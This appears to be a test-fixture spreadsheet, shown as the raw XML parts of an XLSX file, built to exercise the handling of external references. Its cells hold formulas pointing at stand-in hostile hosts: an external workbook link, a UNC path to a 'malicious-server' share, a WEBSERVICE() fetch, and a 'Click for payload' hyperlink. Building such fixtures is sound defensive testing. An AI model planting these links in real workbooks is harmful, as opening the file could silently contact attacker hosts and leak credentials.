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  <externalReferences>
    <externalReference r:id="rId3"/>
  </externalReferences>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="0" uniqueCount="0"/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haredStrings" Target="sharedStrings.xml"/>
    <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink1.xml"/>
</Relationships>
</file>

<file path=xl/externalLinks/_rels/externalLink1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLinkPath" Target="http://malicious-site.example.com/data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</externalBook>
</externalLink>
</file>

<file path=xl/worksheets/_rels/sheet1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://malicious-site.example.com/payload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REFERENCE TEST WORKBOOK</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>External links below:</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="str">
        <f>='http://malicious-site.example.com/[data.xlsx]Sheet1'!A1</f>
        <v>External Link 1</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" t="str">
        <f>='\\malicious-server\share\[workbook.xlsx]Sheet1'!B2</f>
        <v>UNC Path Link</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="str">
        <f>=WEBSERVICE("http://malicious-site.example.com/api/data")</f>
        <v>Web Service Call</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="A6" r:id="rId1" display="Click for payload"/>
  </hyperlinks>
</worksheet>
</file>